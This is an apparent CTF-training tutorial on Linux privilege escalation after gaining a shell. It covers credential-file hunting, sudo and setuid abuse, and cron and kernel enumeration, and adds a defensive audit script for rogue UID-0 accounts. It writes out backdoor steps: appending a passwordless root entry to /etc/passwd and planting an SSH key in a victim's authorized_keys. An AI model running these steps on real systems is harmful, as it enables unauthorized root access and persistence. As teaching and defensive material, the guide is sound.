You just got shell access to a server.
Let's start with an exhaustive inventory of what is accessible to your account.
On your first servers, it is preferable to run these enumerations by launching the commands manually, so you become familiar with the options and outputs. Once comfortable, and knowing what you are looking for, feel free to use scripts that do these enumerations for you.
Find .txt or .cfg files, owned by other accounts, and readable.
find /home -readable -type f \( -iname \*.txt -o -iname \*.cfg \) 2>/dev/null
find /home -readable -type f -regextype posix-extended -regex '.*\.(txt|cfg)' 2>/dev/null
(on BSD/macOS find, the -E option replaces -regextype and must precede the path: find -E /home -readable -type f -regex '.*\.(txt|cfg)' 2>/dev/null)
The WordPress config file is:
wp-config.php
Let's find it:
find /var -name wp-config.php 2>/dev/null
This config file contains the login/password used to connect to the blog database. By dumping the database, it is thus possible to get the WordPress users' logins and password hashes.
The Apache config file may be named:
httpd.conf
apache2.conf
It is usually found in one of these directories:
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
The Tomcat config file is named:
server.xml
User accounts can be found in:
tomcat-users.xml
These files are usually found in:
TOMCAT-HOME/conf/
/usr/local/tomcat/conf/
Sudo allows launching commands as another user.
To know the sudo rights of your account, launch the command sudo -l and enter your password:
sudo -l
User1 can use the following commands on target-host:
(ALL) NOPASSWD: /usr/bin/find
(user2) NOPASSWD: /usr/bin/python3 /home/user2/run.py
It is then possible to run commands as user2 with the option -u user2:
sudo /usr/bin/find
sudo -u user2 /usr/bin/python3 /home/user2/run.py
You can run find with root account rights, and run.py with user2 account rights.
If the NOPASSWD option is not defined, the sudo command asks for the current account's password. If you got in through a webshell, or through an SSH connection with a private key, you will have to find that password some other way.
Identify binaries with the setuid bit set
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
What can you do with a setuid binary?
- Run a shell
- Read a flag
- Copy a file
- Add an entry in a file : /etc/sudoers, /etc/passwd, ~/.ssh/authorized_keys
- ...
Many programs can launch a shell, which is ideal when combined with sudo or a setuid bit.
- find
- nmap
- vi
- less
- awk
- tee
...
Reference: https://gtfobins.github.io/
If you have the rights to modify /etc/passwd, you can become root, for example with tee run via sudo as root. Add an entry with a UID of 0 (root's UID) and an empty password field.
echo myroot::0:0:::/bin/bash | sudo tee -a /etc/passwd
su myroot
echo 'ssh-rsa AAAAB3[...]CHN2CpQ== yolo@yolospacehacker.com' > /home/victim/.ssh/authorized_keys
ssh -i id_rsa victim@iptarget
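The defender's counterpart of the /etc/passwd trick above, as an added example that is not part of the original page: an audit function that flags extra UID-0 accounts and empty password fields in a passwd-format file. The sample passwd content below is constructed.

```sh
#!/bin/sh
# Added audit example (not from the original page): scan a passwd-format
# file for the backdoor pattern shown above. Two signs are flagged:
#   - an account other than root whose UID is 0
#   - an account whose password field is empty
# Reads passwd lines on stdin, prints one "login:reason" line per finding.
find_rogue_uid0() {
    awk -F: '
        # $1 = login, $2 = password field, $3 = UID
        $3 == 0 && $1 != "root" { print $1 ":uid0" }
        $2 == ""                { print $1 ":empty-password" }
    '
}

# Constructed sample; the last line is the kind of entry added with tee above.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1000:1000:user1:/home/user1:/bin/bash
myroot::0:0:::/bin/bash'

# Run against the sample (on a live host: find_rogue_uid0 < /etc/passwd)
printf '%s\n' "$SAMPLE_PASSWD" | find_rogue_uid0
```

Any output at all is worth an alert; a clean system prints nothing.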
Identify processes running as root
ps eaxf
Once an interesting process is found, see if it is possible to modify the files read by the process, or if the process has known vulnerabilities.
Identify cron tasks.
cat /etc/cron.d/*
cat /var/spool/cron/*
crontab -l
cat /etc/crontab
ls -la /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly
systemctl list-timers
With the ps command, you may miss a short-lived process, launched every 2 minutes, which runs a script in 5 seconds before disappearing. The pspy tool monitors the processes for you.
https://github.com/DominicBreuker/pspy
Linux distribution version:
cat /etc/issue
Ubuntu 18.04.3 LTS
Linux kernel version: 5.0.0-37-generic
uname -a
Linux yoloctf-server 5.0.0-37-generic #40~18.04.1-Ubuntu SMP Thu Nov 14 12:06:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Once the kernel version is known, it is possible to search for a kernel exploit.
https://github.com/SecWiki/linux-kernel-exploits
Never run an unknown binary!
Get the sources, read them, understand what they do, compile them yourself, and only then run them, knowing that there is a high risk of crashing the server.
Some well-known scripts automate the enumeration process.
Test them and find the one that suits you best.
LinPEAS : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
LinEnum.sh : https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
linuxprivchecker.py : https://github.com/sleventyeleven/linuxprivchecker
unixprivesc.sh : https://github.com/pentestmonkey/unix-privesc-check
lse.sh : https://github.com/diego-treitos/linux-smart-enumeration